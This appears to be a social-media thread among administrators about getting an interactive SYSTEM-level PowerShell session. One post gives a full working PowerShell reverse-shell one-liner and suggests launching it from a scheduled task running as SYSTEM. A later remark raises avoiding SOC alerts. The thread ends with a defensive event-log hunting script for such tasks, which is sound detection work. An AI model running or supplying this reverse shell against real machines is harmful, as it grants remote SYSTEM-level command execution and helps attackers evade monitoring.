Why is it so hard to get an interactive #PowerShell console as NT Authority#SYSTEM?!
@sassdawe I know psexec -s is a default answer, but I guess your whole point was using native PowerShell.
Looks like a job for a revshell!
First I found a listener here:
https://gist.github.com/staaldraad/8473da7f2dfed28b2216b15ca6ebad11
Run that in one window.
Then saved this revshell as a file:
$LHOST = "127.0.0.1"; $LPORT = 413; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()
Create a Scheduled Task that runs as SYSTEM and runs it.
@sassdawe Because there is no need to run anything as SYSTEM if you as administrator of the OS do your job properly. Otherwise you can always rely on Sysinternals tools.
@jsmall you know that I am not going to run this, don't you? 😁
I ended up using the Invoke-CommandAs module, because there is an -AsSystem parameter which does exactly that: it creates a Scheduled Task as SYSTEM, and I can use Enter-PSHostProcess to jump into that scheduled task and run my code.
My frustration comes from the fact that Admin to System is not a security boundary when it comes to Bug Bounties, so why is this so hard to do?
@sassdawe but that wouldn't require an interactive shell. That just would require a scheduled task running as SYSTEM. And that's an easy one to create.
@Brokar Ideally, yes.
But I am stuck with LAPS, so I first need to go from my normal account to the LAPS admin account, and from there to SYSTEM. Without actually trying to type that stupid admin password into the UAC prompt.
@sassdawe Also keep in mind that SYSTEM has no profile of its own, so many things you'd expect in a user environment don't exist there. That would make using an interactive shell more prone to produce errors than running the script in a scheduled task, which would simulate the same environment Intune finds when it runs.
@Brokar true, this is why I use Enter-PSHostProcess
https://infosec.exchange/@sassdawe/113095372901377083
@jsmall haha
I also need to not trigger any alerts at the SOC.
@jsmall That said, I am surprised that someone impersonating SYSTEM has not triggered anything. 🤔
@sassdawe I wonder if it logs something I could hunt for.
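One thing that can be hunted for is the artifact the thread itself describes: a scheduled task registered with a SYSTEM principal. The script below is an added example, not code from anyone in the thread or from the Invoke-CommandAs module; it assumes the Security log is readable (run elevated) and that the "Other Object Access Events" audit subcategory is enabled, since event 4698 (a scheduled task was created) is not written otherwise.

```powershell
# Added example: list scheduled-task registrations whose principal is SYSTEM.
# Assumptions: Security log access, 4698 auditing enabled, 7-day lookback by default.
function Find-SystemTaskRegistrations {
    param([int]$Days = 7)
    $filter = @{ LogName = 'Security'; Id = 4698; StartTime = (Get-Date).AddDays(-$Days) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # Flatten the EventData <Data Name="..."> elements into a hashtable.
        $x = [xml]$_.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        # TaskContent carries the full task definition XML (principal, triggers, actions).
        $task = [xml]$d['TaskContent']
        $userId = $task.Task.Principals.Principal.UserId
        # Match the well-known SID or the name forms used for the local SYSTEM account.
        if ($userId -match '^(S-1-5-18|(NT AUTHORITY\\)?SYSTEM)$') {
            [pscustomobject]@{
                Time     = $_.TimeCreated
                Creator  = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
                TaskName = $d['TaskName']
                RunsAs   = $userId
                Command  = ($task.Task.Actions.Exec.Command, $task.Task.Actions.Exec.Arguments) -join ' '
            }
        }
    }
}

Find-SystemTaskRegistrations | Format-Table -AutoSize
```

The Creator column (the account that registered the task) is the useful pivot: a SYSTEM-principal task registered interactively by an admin account, especially one launching powershell.exe, is exactly the pattern discussed above and is easy to baseline against legitimate management tooling.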